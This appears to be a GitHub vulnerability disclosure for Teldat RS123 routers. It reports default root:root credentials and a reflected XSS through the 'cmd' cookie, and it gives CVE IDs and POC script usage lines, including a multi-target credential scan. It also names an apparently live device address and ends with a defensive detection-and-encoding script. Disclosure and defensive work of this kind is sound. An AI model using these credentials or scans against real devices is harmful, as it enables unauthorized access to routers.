# Teldat-s-Router

Reflected XSS and weak password vulnerabilities in Teldat's Router.

Bug URL: http://189.206.168.49/upgrade/index.html

Vulnerable version: RS123, RS123w

1. Weak password (CWE-521: Weak Password Requirements)

Account: root, password: root

Vulnerability proof:

![image](https://user-images.githubusercontent.com/38815439/187359831-81c7aa38-9428-4b5a-8c6e-e91a300f263c.png)

2. Reflected XSS vulnerability

After logging in, enter the admin backend and capture the request sent by Restart:

![image](https://user-images.githubusercontent.com/38815439/187360420-ede1e1d2-8df8-45ec-9ba3-8082f75b29da.png)

Entering `aaaa` returns `aaaa`, so a reflected XSS vulnerability is suspected:

![image](https://user-images.githubusercontent.com/38815439/187361294-caa42e23-c68e-4f42-a1f3-8e1c125d05d8.png)

I went to the `cmd` cookie and wrote the XSS payload, and the pop-up was successful:

![image](https://user-images.githubusercontent.com/38815439/187361658-2b24b895-ab0c-47fd-b6fe-d569fa4d011d.png)

View the effect in the browser:

![image](https://user-images.githubusercontent.com/38815439/187362213-273af07e-9fdb-40fe-8d65-805ceef76072.png)

---

## CVE Assignments

| CVE ID | Type | CWE | CVSS | Severity |
|--------|------|-----|------|----------|
| CVE-2022-39996 | Reflected XSS | CWE-79 | 6.1 | Medium |
| CVE-2022-39997 | Weak Password | CWE-521 | 9.8 | Critical |

---

## POC Scripts

### Requirements

```bash
pip install requests paramiko
```

### CVE-2022-39997 - Weak Password POC

Check for default credentials `root:root` across multiple services:

```bash
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1

# Full check (all services)
python CVE-2022-39997.py -t 192.168.1.1 --all

# Scan multiple targets
python CVE-2022-39997.py -f targets.txt
```

### CVE-2022-39996 - Reflected XSS POC

Test the XSS vulnerability via the `cmd` cookie parameter:

```bash
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1

# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root

# Test multiple XSS payloads
python CVE-2022-39996.py -t 192.168.1.1 --multi

# Generate standalone POC HTML
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc

# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload ""
```

### Disclaimer

These POC scripts are for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.
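
A defender-side check for the `cmd` cookie reflection described above, as an added example that is not part of this repository's scripts: it flags logged requests whose `cmd` cookie carries HTML markup after percent-decoding, and shows output encoding of a reflected value. The `(client, Cookie header)` log format, the function names and the sample data are constructed assumptions; how the router firmware builds its response is not shown on this page.

```python
import html
import re
from urllib.parse import unquote

# Characters that let a reflected value break out of HTML text or an attribute.
MARKUP = re.compile(r"[<>\"'`]")

def cmd_cookie(cookie_header):
    """Return the raw value of the `cmd` cookie, or None if it is absent."""
    for pair in cookie_header.split(";"):
        name, _, value = pair.strip().partition("=")
        if name == "cmd":
            return value
    return None

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(requests):
    """Return (client, decoded cmd value) for requests whose cmd cookie carries markup."""
    hits = []
    for client, cookie_header in requests:
        raw = cmd_cookie(cookie_header)
        if raw is not None and MARKUP.search(decode_fully(raw)):
            hits.append((client, decode_fully(raw)))
    return hits

def render_reflection(value):
    """Mitigation side (assumed handler): encode the value before echoing it into HTML."""
    return "<td>" + html.escape(value, quote=True) + "</td>"

# Constructed sample: (client address, Cookie header) pairs as a proxy might log them.
SAMPLE = [
    ("10.0.0.5", "session=abc123; cmd=aaaa"),
    ("10.0.0.9", "session=def456; cmd=%3Cb%3Etest%3C%2Fb%3E"),
    ("10.0.0.7", "cmd=%253Ci%253Ex; lang=en"),
    ("10.0.0.3", "session=ghi789"),
]

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE):
        print(client, repr(value), "->", render_reflection(value))
```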